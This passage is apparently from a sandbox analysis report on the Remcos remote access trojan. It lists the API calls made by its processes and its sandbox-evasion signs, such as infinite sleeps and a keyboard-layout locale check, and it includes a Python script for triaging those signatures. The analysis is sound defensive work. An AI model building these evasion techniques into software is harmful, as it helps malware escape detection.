1@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\sm.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2876Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\sm.exe TID: 692Thread sleep time: -49883s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\sm.exe TID: 600Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\sm.exe TID: 972Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 2472Thread sleep time: -49964s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 1544Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 2428Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 2928Thread sleep time: -51291s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 1776Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 2456Thread sleep count: 333 > 30
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 2456Thread sleep time: -3330000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 2088Thread sleep time: -50128s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 2172Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 1920Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 27_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh
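The sleep, delay and GetKeyboardLayout signatures above are the sandbox-evasion evidence a triage script should pull out of a report per process image rather than reading line by line. The following Python is an added example for this page; it is not part of the Joe Sandbox report and not code from the sample. It parses lines in the format shown above (the embedded input is constructed from the report's own values with the column spacing normalised, and the parser also accepts the fused "remcos.exeThread delayed" form left by the HTML extraction) and tags each process image. Two assumptions are this example's own: the value 922337203685477 is treated as an infinite wait because it equals 2**63 // 10000, the largest NT relative interval expressed in milliseconds, and the tag names (infinite_wait, long_sleep, sleep_loop, locale_check) are an invented scheme, not report vocabulary.

```python
import re
from collections import defaultdict

# Constructed sample input: values copied from the report's signature lines,
# column spacing normalised. Not part of the report itself.
SAMPLE_LINES = """\
Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe TID: 2472 Thread sleep time: -922337203685477s >= -30000s
Source: C:\\Users\\user\\AppData\\Local\\Temp\\sm.exe TID: 692 Thread sleep time: -49883s >= -30000s
Source: C:\\Users\\user\\AppData\\Local\\Temp\\sm.exe TID: 600 Thread sleep time: -60000s >= -30000s
Source: C:\\Users\\user\\AppData\\Roaming\\Remcos\\remcos.exe Thread delayed: delay time: 922337203685477
Source: C:\\Users\\user\\AppData\\Roaming\\Remcos\\remcos.exe TID: 2456 Thread sleep count: 333 > 30
Source: C:\\Users\\user\\AppData\\Roaming\\Remcos\\remcos.exe TID: 2456 Thread sleep time: -3330000s >= -30000s
Source: C:\\Users\\user\\AppData\\Local\\Temp\\sm.exe Code function: 18_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh
Source: C:\\Windows\\SysWOW64\\wscript.exe Window found: window name: WSH-Timer
"""

# 2**63 100-nanosecond ticks expressed in milliseconds: the largest relative
# interval the NT kernel accepts. Assumption of this example: treat it as an
# infinite wait rather than a real delay.
INFINITE_SENTINEL = 2**63 // 10000  # 922337203685477

# The optional space before each column keyword tolerates both the spaced form
# and the fused form ("remcos.exeThread delayed") left by HTML-to-text extraction.
_SRC = r"^Source: (?P<src>.+?\.exe)"
_TID = r"(?: TID: (?P<tid>\d+))?"
SLEEP_RE = re.compile(_SRC + _TID + r" ?Thread sleep time: -?(?P<amount>\d+)s >= -?(?P<thr>\d+)s$")
COUNT_RE = re.compile(_SRC + _TID + r" ?Thread sleep count: (?P<count>\d+) > (?P<thr>\d+)$")
DELAY_RE = re.compile(_SRC + r" ?Thread delayed: delay time: (?P<amount>\d+)$")
KBD_RE = re.compile(_SRC + r" ?Code function: (?P<fn>\S+) GetKeyboardLayout followed by cmp: "
                    r"(?P<cmp>cmp \w+, \w+) and CTI: (?P<cti>j\w+ [0-9A-Fa-f]+h)$")


def _image(path):
    """Basename of a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1]


def summarize(text, default_threshold=30000):
    """Group the report's evasion indicators per process image.

    Tags (this example's own scheme, not report vocabulary):
      infinite_wait - a wait equal to INFINITE_SENTINEL
      long_sleep    - a finite wait at or above the report's threshold
      sleep_loop    - a sleep count above the report's threshold
      locale_check  - GetKeyboardLayout result compared against a constant
    Lines matching none of the patterns are returned under "unparsed".
    """
    procs = defaultdict(lambda: {"tags": set(), "max_wait": 0,
                                 "sleep_counts": [], "locale_checks": []})
    unparsed = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SLEEP_RE.match(line) or DELAY_RE.match(line)
        if m:
            p = procs[_image(m.group("src"))]
            amount = int(m.group("amount"))  # sign stripped: relative NT intervals print negative
            thr = int(m.groupdict().get("thr") or default_threshold)
            p["max_wait"] = max(p["max_wait"], amount)
            if amount == INFINITE_SENTINEL:
                p["tags"].add("infinite_wait")
            elif amount >= thr:
                p["tags"].add("long_sleep")
            continue
        m = COUNT_RE.match(line)
        if m:
            p = procs[_image(m.group("src"))]
            count = int(m.group("count"))
            p["sleep_counts"].append(count)
            if count > int(m.group("thr")):
                p["tags"].add("sleep_loop")
            continue
        m = KBD_RE.match(line)
        if m:
            p = procs[_image(m.group("src"))]
            p["locale_checks"].append((m.group("fn"), m.group("cmp"), m.group("cti")))
            p["tags"].add("locale_check")
            continue
        unparsed.append(line)
    return {
        "processes": {img: dict(d, tags=sorted(d["tags"])) for img, d in procs.items()},
        "unparsed": unparsed,
    }


if __name__ == "__main__":
    result = summarize(SAMPLE_LINES)
    for image, info in sorted(result["processes"].items()):
        print(f"{image}: {', '.join(info['tags'])} (max wait {info['max_wait']})")
    for line in result["unparsed"]:
        print("unparsed:", line)
```

Run stand-alone it prints one line per image (powershell.exe only the infinite wait, sm.exe the locale check plus long sleeps, remcos.exe all three wait tags) and lists the WSH-Timer window line as unparsed. The per-image grouping matters because the same code function (00405156) appears under three process IDs here; grouping by image rather than by PID collapses the injected copies of remcos.exe into one verdict.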
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$
basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@
D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char
